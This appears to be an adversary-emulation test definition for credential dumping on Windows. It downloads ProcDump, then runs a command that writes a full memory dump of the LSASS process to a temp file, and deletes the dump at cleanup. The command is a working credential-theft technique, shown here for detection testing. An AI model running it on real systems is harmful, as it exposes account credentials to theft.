#TechniqueName: OS Credential Dumping: LSASS Memory
#AtomicTestName: Dump LSASS.exe Memory using ProcDump
#Language: cmd

#get_prereq_commands
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\procdump.exe) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe PathToAtomicsFolder\T1003.001\bin\procdump.exe -Force


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}


#commands
PathToAtomicsFolder\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp


#cleanup_commands
del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul

